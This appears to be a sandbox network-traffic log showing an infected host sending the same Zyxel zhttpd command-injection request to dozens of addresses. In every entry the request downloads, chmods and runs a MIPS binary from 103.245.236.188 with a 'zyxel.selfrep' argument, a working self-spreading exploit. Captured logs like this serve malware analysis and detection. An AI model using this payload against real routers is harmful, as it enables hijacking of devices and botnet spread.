                                                Jan 12, 2024 18:24:53.284085035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8882192.168.2.1357694107.17.210.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284126043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8883192.168.2.1351514187.162.77.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284188986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8884192.168.2.133464493.254.30.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284239054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8885192.168.2.1335226170.7.127.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284296036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8886192.168.2.1339092174.247.80.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284380913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8887192.168.2.133591273.227.232.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284430027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8888192.168.2.133718845.52.137.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284482956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8889192.168.2.1336584177.193.153.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284508944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8890192.168.2.133993624.59.160.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284569025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8891192.168.2.1353322207.155.30.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284626961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8892192.168.2.1350962101.250.185.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284653902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8893192.168.2.133506223.71.15.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284729004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8894192.168.2.134520635.193.108.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284796953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8895192.168.2.133573814.120.102.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284859896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8896192.168.2.1351124129.143.204.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284897089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8897192.168.2.1336736151.16.196.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.284945965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8898192.168.2.135730668.72.27.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285020113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8899192.168.2.1354646180.178.174.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285063028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8900192.168.2.135469220.231.4.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285145998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8901192.168.2.135719687.210.184.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285181046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8902192.168.2.1336692116.124.208.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285250902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8903192.168.2.133521493.47.71.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285288095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8904192.168.2.1349296166.15.60.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285361052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8905192.168.2.1346156217.168.120.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285419941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8906192.168.2.135522287.138.101.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285485029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8907192.168.2.134708499.243.132.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285511017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8908192.168.2.133453490.238.64.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285568953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8909192.168.2.134201462.231.11.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285609961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8910192.168.2.1335530200.51.95.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285645008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8911192.168.2.134718097.86.209.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285717010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8912192.168.2.1353184113.106.124.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285751104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8913192.168.2.1346160106.229.182.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285813093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8914192.168.2.134674484.139.64.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285839081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8915192.168.2.1349830110.52.48.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285904884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8916192.168.2.1333604147.189.217.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.285995960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8917192.168.2.134091472.5.173.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286045074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8918192.168.2.135238073.240.251.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286098003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8919192.168.2.134959260.54.158.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286128044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8920192.168.2.134767245.235.43.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286153078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8921192.168.2.1343298209.9.173.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286195040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8922192.168.2.1338092133.29.129.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286293030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8923192.168.2.1343796167.82.140.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286334038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8924192.168.2.134193690.52.37.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286390066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8925192.168.2.134720247.73.57.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286433935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8926192.168.2.134618649.143.198.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286468029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8927192.168.2.1338232152.117.197.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286523104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8928192.168.2.134401254.68.21.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286587000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8929192.168.2.135373044.7.33.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286652088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8930192.168.2.1337870193.216.1.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286720037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8931192.168.2.13456865.182.180.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286768913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8932192.168.2.134499499.17.169.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286809921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8933192.168.2.1333702145.207.156.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286848068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8934192.168.2.1357038113.169.8.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286935091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8935192.168.2.1336194218.5.222.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.286959887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8936192.168.2.133575087.213.64.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287019968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8937192.168.2.1346602120.68.138.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287080050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8938192.168.2.1340182156.21.118.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287157059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8939192.168.2.1344720176.144.243.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287190914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8940192.168.2.134413493.52.0.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287276030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8941192.168.2.135047269.222.60.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287307978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8942192.168.2.13418909.59.21.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287341118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8943192.168.2.1333748208.70.15.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287410021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8944192.168.2.1352744174.183.20.235443
                                                TimestampBytes transferredDirectionData
